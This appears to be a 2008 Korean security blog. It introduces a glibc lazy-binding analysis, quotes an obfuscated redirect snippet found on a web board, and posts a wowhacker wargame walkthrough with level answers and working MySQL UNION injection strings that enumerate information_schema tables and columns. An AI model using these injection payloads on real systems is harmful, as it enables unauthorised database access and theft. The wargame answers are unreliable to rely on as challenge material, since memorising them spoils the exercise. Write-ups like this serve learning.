glibc-2.5/elf/dl-runtime.c 코드 분석을 통한 lazy binding 재배치 방식 분석

2008. 6. 23. 10:30
Author : 유동훈 (Xpl017Elz) in INetCop
E-mail : szoahc@hotmail.com
Home: http://x82.inetcop.org

 재배치란 무엇인가?

현재 linux ELF에서는 공유라이브러리 핸들링할 때, 런타임 링킹 방식을 표준으로 사용하고 있다.
이는 실행 과정 중 정의되지 않은 심볼을 찾아서 연결시키는 과정으로, 공유라이브러리를 사용하는
모든 바이너리는 런타임 링커를 통한 바인딩(재배치) 과정을 거친다. 현재 linux에서 사용하고 있는
재배치 방식은 지연 바인딩(lazy binding) 방식이며, 이는 실제로 함수를 처음 호출할 때 심볼을
링킹하는 방식이다. 이와 같은 링킹 방식은 프로그램 성능을 위해 설계된 것이라 할 수 있다.
런타임 링커는 다른 의미로 프로그램 해석기, 심볼 해석기, 라이브러리 로더등으로 불리고 있으며,
/lib/ld-linux.so 파일이다.

사용자의 프로그램이 라이브러리내의 함수를 호출하였을 때, 어떤 식으로 재배치되는지 알아보도록
하겠다. 먼저, 사용자의 프로그램이 실행되면 libc.so 라이브러리를 다음과 같이 배치한다

http://x82.inetcop.org/h0me/papers/FC_exploit/relocation.txt

'Sabzil' 카테고리의 다른 글

ABI (Application Binary Interface)  (0) 2009.03.17
Nefif_rx  (0) 2009.03.17
usleep에 대해서  (0) 2009.01.08
strtok_r  (0) 2008.09.29
this is RAM  (0) 2008.08.21
nit_if.h  (0) 2008.07.17
about ftp  (0) 2008.07.15
amd64 and x86 endian order  (0) 2008.06.23
xss in 엠파스 게시판  (0) 2008.06.22
sk_buff 구조체  (0) 2008.06.17

badcob Sabzil

xss in 엠파스 게시판

2008. 6. 22. 21:57

http://newscomm.empas.com/board/bbs/read.html?a=180886&b=star&p=0


엠파스 게시판에서 이따금씩 처자사진들을 클릭해서 보는데 종종 성인 게시판이 링크가 되있길래
위의 링크에서 소스를 봤더니

document.write("<EMBED src=http://my.%44%72%45%41%4dw%49z.com/mkmkloklop/bbbb.wmv width=6 height=6>"); 

의심가는 내용은 저 한줄입니다.. paros로 봤더니 잠시뒤에 특정 페이지로 요청을 보낸 후 성인 게시판으로 이동이 되네요. response 메세지를 보고 싶었는데 웹프락시나 패킷 캡쳐를 해봐도 좀처럼 나오질 않네요. wmv 파일로 어떻게 xss를 하는지 궁금하군요

'Sabzil' 카테고리의 다른 글

ABI (Application Binary Interface)  (0) 2009.03.17
Nefif_rx  (0) 2009.03.17
usleep에 대해서  (0) 2009.01.08
strtok_r  (0) 2008.09.29
this is RAM  (0) 2008.08.21
nit_if.h  (0) 2008.07.17
about ftp  (0) 2008.07.15
amd64 and x86 endian order  (0) 2008.06.23
glibc-2.5/elf/dl-runtime.c 코드 분석을 통한 lazy binding 재배치 방식 분석  (0) 2008.06.23
sk_buff 구조체  (0) 2008.06.17

badcob Sabzil

wowhacker web and binary

2008. 6. 21. 12:25


i love tiger mac  - php 셋팅 문제. 확장자 phps로 주면 소스가 보임
where is fckorea?! - filedownload
iwantknowmoreMrjones! - unix_timestamp() 를 이용 unixtimestamp 형식으로 바꾼후 md5 해쉬값으로
                                     파일 다운로드
level4:VeRY Good! My Friend!    admin 세션 하이재킹, 공지 쓴 시간 추측 , 세션 생성 패턴, md5 해쉬

level5: ISayDDaeYouSayMireoyo! 아파치 웹서버 인증 우회. get put  이외에 options put 등의 메소드를 활용

level6: IhateCrazyCow.too! 자바스크립트 디코딩 인코딩  http://scriptasylum.com/tutorials/encdec/encode-decode.html

level7 : If you dream it, you can do it  mysql 인젝션 limit 쿼리문 사용

Admin 'union Select Table_Name,Table_Name,Table_Name,Table_Name,Table_Name,Table_Name From Information_Schema.Tables Limit 18,1# keytable
Admin 'union Select Table_Name,Table_Name,Table_Name,Table_Name,Table_Name,Table_Name From Information_Schema.Tables Limit 19,1# user_info

admin' union SELECT column_name,column_name,column_name,column_name,column_name,column_name FROM information_schema.columns WHERE table_name='user_info' limit 2,1#

admin' union SELECT column_name,column_name,column_name,column_name,column_name,column_name FROM information_schema.columns WHERE table_name='keytable' limit 1,1#


binary

level1 : D0n7 sm0k1ng!!

badcob War game